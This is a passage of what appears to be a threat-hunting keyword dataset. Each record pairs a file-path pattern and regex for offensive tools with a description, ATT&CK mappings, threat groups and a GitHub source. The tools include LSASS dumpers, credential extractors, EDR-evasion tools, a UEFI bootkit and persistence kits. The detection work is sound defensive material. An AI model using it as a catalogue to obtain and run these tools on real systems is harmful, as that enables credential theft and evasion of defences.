- T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/DumpAADSyncCreds.git*",".{0,1000}\/DumpAADSyncCreds\.git.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*/DumpCerts*",".{0,1000}\/DumpCerts.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*/DumpCreds*",".{0,1000}\/DumpCreds.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*/dumpCredStore.ps1*",".{0,1000}\/dumpCredStore\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/dumper.ps1*",".{0,1000}\/dumper\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*/dumpert.c*",".{0,1000}\/dumpert\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*/Dumpert/*",".{0,1000}\/Dumpert\/.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1404","238","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*/DumpIt.exe*",".{0,1000}\/DumpIt\.exe.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","1","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*/DumpLsass.ps1*",".{0,1000}\/DumpLsass\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/dumpmethod/*.py",".{0,1000}\/dumpmethod\/.{0,1000}\.py","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*/dumpSecrets.go*",".{0,1000}\/dumpSecrets\.go.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*/dumpsecrets_test.go*",".{0,1000}\/dumpsecrets_test\.go.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","1","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*/DumpShellcode/*",".{0,1000}\/DumpShellcode\/.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*/DumpsterFire/*",".{0,1000}\/DumpsterFire\/.{0,1000}","offensive_tool_keyword","DumpsterFire","The DumpsterFire Toolset is a modular. menu-driven. cross-platform tool for building repeatable. time-delayed. distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents. distractions. and lures to support and scale their operations. Turn paper tabletop exercises into controlled live fire range events. Build event sequences (narratives) to simulate realistic scenarios and generate corresponding network and filesystem artifacts.","T1175 - T1176 - T1589","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/TryCatchHCF/DumpsterFire","1","0","N/A","N/A","10","967","148","2020-05-27T15:00:56Z","2017-10-05T23:44:54Z" "*/DumpThatLSASS.*",".{0,1000}\/DumpThatLSASS\..{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*/DumpThatLSASS.git*",".{0,1000}\/DumpThatLSASS\.git.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*/DumpThatLSASS/*",".{0,1000}\/DumpThatLSASS\/.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*/dumpweb.log*",".{0,1000}\/dumpweb\.log.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" "*/dumpXor.exe*",".{0,1000}\/dumpXor\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","531","75","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*/dumpXor/dumpXor*",".{0,1000}\/dumpXor\/dumpXor.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","531","75","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*/dunderhay/CVE-202*",".{0,1000}\/dunderhay\/CVE\-202.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/dunderhay/CVE-2020-5902","1","1","N/A","N/A","1","37","8","2024-03-19T01:21:06Z","2020-07-06T04:03:58Z" "*/duplicates.nse*",".{0,1000}\/duplicates\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/DynastyPersist.git*",".{0,1000}\/DynastyPersist\.git.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*/DynastyPersist/src/*.sh*",".{0,1000}\/DynastyPersist\/src\/.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*/e2e_commands.txt*",".{0,1000}\/e2e_commands\.txt.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/e2e_test.py*",".{0,1000}\/e2e_test\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/eap-info.nse*",".{0,1000}\/eap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ebapc_injection.exe*",".{0,1000}\/ebapc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/Ebowla.git*",".{0,1000}\/Ebowla\.git.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","724","167","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*/ebowla.py*",".{0,1000}\/ebowla\.py.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","724","167","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*/ec2__backdoor_ec2_sec_groups*",".{0,1000}\/ec2__backdoor_ec2_sec_groups.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/ec2__check_termination_protection*.py",".{0,1000}\/ec2__check_termination_protection.{0,1000}\.py","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/ec2__startup_shell_script/main.py*",".{0,1000}\/ec2__startup_shell_script\/main\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/ec2_public_ips_*_*.txt*",".{0,1000}\/ec2_public_ips_.{0,1000}_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/EC2Looter.py*",".{0,1000}\/EC2Looter\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","69","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*/echoac-poc.git*",".{0,1000}\/echoac\-poc\.git.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","135","26","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z" "*/edb-35948/*",".{0,1000}\/edb\-35948\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/EDD.exe",".{0,1000}\/EDD\.exe","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/EDR_Detector.git*",".{0,1000}\/EDR_Detector\.git.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","7","1","78","15","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z" "*/EDR_Detector.rs*",".{0,1000}\/EDR_Detector\.rs.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","7","1","78","15","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z" "*/EDRaser.git*",".{0,1000}\/EDRaser\.git.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*/edraser.py*",".{0,1000}\/edraser\.py.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*/edr-checker/*",".{0,1000}\/edr\-checker\/.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/EDRSandblast.git*",".{0,1000}\/EDRSandblast\.git.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*/EDRSandblast/*",".{0,1000}\/EDRSandblast\/.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*/EDRSilencer.c*",".{0,1000}\/EDRSilencer\.c.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","1","N/A","10","9","876","119","2024-01-24T15:52:24Z","2023-12-26T04:15:39Z" "*/EDRSilencer.git*",".{0,1000}\/EDRSilencer\.git.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","1","N/A","10","9","876","119","2024-01-24T15:52:24Z","2023-12-26T04:15:39Z" "*/EfiDSEFix.cpp*",".{0,1000}\/EfiDSEFix\.cpp.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*/EfiDSEFix.exe*",".{0,1000}\/EfiDSEFix\.exe.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*/EfiGuard.sln*",".{0,1000}\/EfiGuard\.sln.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*/EfiGuardDxe.c*",".{0,1000}\/EfiGuardDxe\.c.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*/EfsPotato.git*",".{0,1000}\/EfsPotato\.git.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","674","118","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z" "*/egghunter.rb*",".{0,1000}\/egghunter\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a 